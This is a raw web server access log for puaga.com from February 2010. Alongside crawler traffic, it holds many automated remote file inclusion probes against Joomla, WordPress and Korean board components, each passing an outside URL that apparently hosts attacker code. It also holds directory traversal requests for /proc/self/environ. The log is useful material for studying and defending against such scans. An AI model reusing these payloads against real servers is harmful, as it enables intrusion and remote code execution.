74.50.85.229 - - [18/Feb/2010:06:23:20 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.171.171.177 - - [18/Feb/2010:06:23:33 -0800] "GET /logs/access_100109.log//include/body.inc.php?content=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
198.171.171.177 - - [18/Feb/2010:06:23:33 -0800] "GET /include/body.inc.php?content=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
198.171.171.177 - - [18/Feb/2010:06:23:34 -0800] "GET /logs//include/body.inc.php?content=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:06:24:19 -0800] "GET /pictures/p7 HTTP/1.0" 301 80 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:06:24:20 -0800] "GET /pictures/p7/ HTTP/1.0" 302 7200 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:06:24:21 -0800] "GET /login/needregister.php HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:06:24:23 -0800] "GET /login/registerError.php HTTP/1.0" 200 6018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:06:24:24 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://www.puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:06:24:25 -0800] "GET /login/dtree.css HTTP/1.0" 404 5258 "http://www.puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:25:39 -0800] "GET /logs/access_100205.log%20%20//skin/zero_vote/error.php?dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:25:39 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:25:39 -0800] "GET /skin/zero_vote/error.php?dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:25:49 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:25:56 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:25:56 -0800] "GET /logs/access_100203.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:25:57 -0800] "GET /logs/access_100130.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:26:37 -0800] "GET /logs/access_100119.log%20%20//skin/zero_vote/error.php?dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:06:26:49 -0800] "GET /logs/access_100129.log%20%20//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:06:26:49 -0800] "GET /?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:06:26:50 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:06:27:11 -0800] "GET /logs/access_100121.log%20%20//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:27:19 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:27:19 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:27:29 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [18/Feb/2010:06:28:15 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [18/Feb/2010:06:28:16 -0800] "GET /ideal/forum/viewtopic.php?p=20061 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
82.77.131.46 - - [18/Feb/2010:06:29:08 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:29:20 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:29:20 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:29:24 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:06:29:35 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:06:29:35 -0800] "GET /logs/access_100127.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:06:29:35 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:06:29:40 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:30:17 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:30:20 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:30:20 -0800] "GET /logs/access_100127.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:30:39 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [18/Feb/2010:06:30:40 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [18/Feb/2010:06:30:40 -0800] "GET /logs/access_100127.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [18/Feb/2010:06:30:40 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [18/Feb/2010:06:30:41 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:06:31:56 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:06:31:56 -0800] "GET /logs/access_100112.log%20%20/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:06:31:56 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:32:00 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:06:32:01 -0800] "GET /logs//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:06:32:01 -0800] "GET /includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:06:32:01 -0800] "GET /logs/access_100127.log%20%20//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:06:32:01 -0800] "GET /logs/access_100129.log%20%20//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:06:32:21 -0800] "GET /logs/access_100121.log/bbs/good.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:06:32:21 -0800] "GET /logs/bbs/good.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:06:32:21 -0800] "GET /bbs/good.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:06:32:44 -0800] "GET /logs/access_100115.log%20%20/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:06:32:44 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:06:32:44 -0800] "GET /logs/access_100118.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:06:32:44 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:06:33:13 -0800] "GET /includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sanvan.net/new/id1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:06:33:13 -0800] "GET /logs//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:06:33:13 -0800] "GET /logs/access_100129.log%20%20//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:06:33:13 -0800] "GET /logs/access_100127.log%20%20//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:06:33:19 -0800] "GET /logs/access_100129.log%20%20//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:06:33:19 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:06:33:19 -0800] "GET /?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:06:33:27 -0800] "GET /logs/access_100120.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:06:33:38 -0800] "GET /logs/access_100121.log%20%20//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:34:14 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:34:14 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:34:14 -0800] "GET /logs/access_100121.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.99.96.218 - - [18/Feb/2010:06:34:56 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.puaga.com"
38.99.96.218 - - [18/Feb/2010:06:34:58 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.puaga.com"
38.99.96.218 - - [18/Feb/2010:06:35:13 -0800] "GET /diger HTTP/1.1" 301 90 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.puaga.com"
38.99.96.218 - - [18/Feb/2010:06:35:29 -0800] "GET /blog HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.puaga.com"
38.99.96.218 - - [18/Feb/2010:06:35:44 -0800] "GET /diger/ HTTP/1.1" 200 3545 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:06:36:00 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:06:36:00 -0800] "GET /logs/access_100118.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:06:36:00 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.99.96.218 - - [18/Feb/2010:06:36:01 -0800] "GET /ideal/forum/viewtopic.php?p=15827 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:06:36:10 -0800] "GET /logs/access_100120.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.99.96.218 - - [18/Feb/2010:06:36:16 -0800] "GET /pictures/p11 HTTP/1.1" 301 97 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.puaga.com"
38.99.96.218 - - [18/Feb/2010:06:36:32 -0800] "GET /pictures/p3 HTTP/1.1" 301 96 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.puaga.com"
38.99.96.218 - - [18/Feb/2010:06:36:47 -0800] "GET /pictures/p5 HTTP/1.1" 301 96 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.puaga.com"
38.99.96.218 - - [18/Feb/2010:06:37:04 -0800] "GET /pictures/p6 HTTP/1.1" 301 96 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.puaga.com"
81.92.193.221 - - [18/Feb/2010:06:37:07 -0800] "GET /logs/access_100121.log/bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
81.92.193.221 - - [18/Feb/2010:06:37:07 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
81.92.193.221 - - [18/Feb/2010:06:37:07 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:06:37:18 -0800] "GET /logs/access_100121.log/bbs/good.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:06:37:18 -0800] "GET /logs/bbs/good.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:06:37:18 -0800] "GET /bbs/good.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.99.96.218 - - [18/Feb/2010:06:37:20 -0800] "GET /pictures/p7 HTTP/1.1" 301 96 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:06:37:46 -0800] "GET /logs/access_100117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.133.29.194 - - [18/Feb/2010:06:39:49 -0800] "GET /logs/access_100125.log/index.php?option=com_facileforms&controller=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [18/Feb/2010:06:39:50 -0800] "GET /logs/access_100125.log/index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [18/Feb/2010:06:39:50 -0800] "GET /logs/access_100125.log/index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [18/Feb/2010:06:39:50 -0800] "GET /index.php?option=com_facileforms&controller=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [18/Feb/2010:06:39:50 -0800] "GET /logs/access_100125.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [18/Feb/2010:06:39:51 -0800] "GET /index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [18/Feb/2010:06:39:51 -0800] "GET /index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [18/Feb/2010:06:39:51 -0800] "GET /errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [18/Feb/2010:06:40:31 -0800] "GET /logs/access_100111.log/index.php?option=com_facileforms&controller=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [18/Feb/2010:06:40:31 -0800] "GET /logs/access_100111.log/index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [18/Feb/2010:06:40:31 -0800] "GET /logs/access_100111.log/index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [18/Feb/2010:06:40:31 -0800] "GET /logs/access_100111.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:06:40:39 -0800] "GET /skin/zero_vote/error.php?dir=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:06:40:39 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:06:40:39 -0800] "GET /logs/access_100205.log%20%20//skin/zero_vote/error.php?dir=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:06:41:29 -0800] "GET /logs/access_100119.log%20%20//skin/zero_vote/error.php?dir=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:06:42:04 -0800] "GET /skin/zero_vote/error.php?dir=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:06:42:04 -0800] "GET /logs/access_100205.log%20%20//skin/zero_vote/error.php?dir=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:06:42:04 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
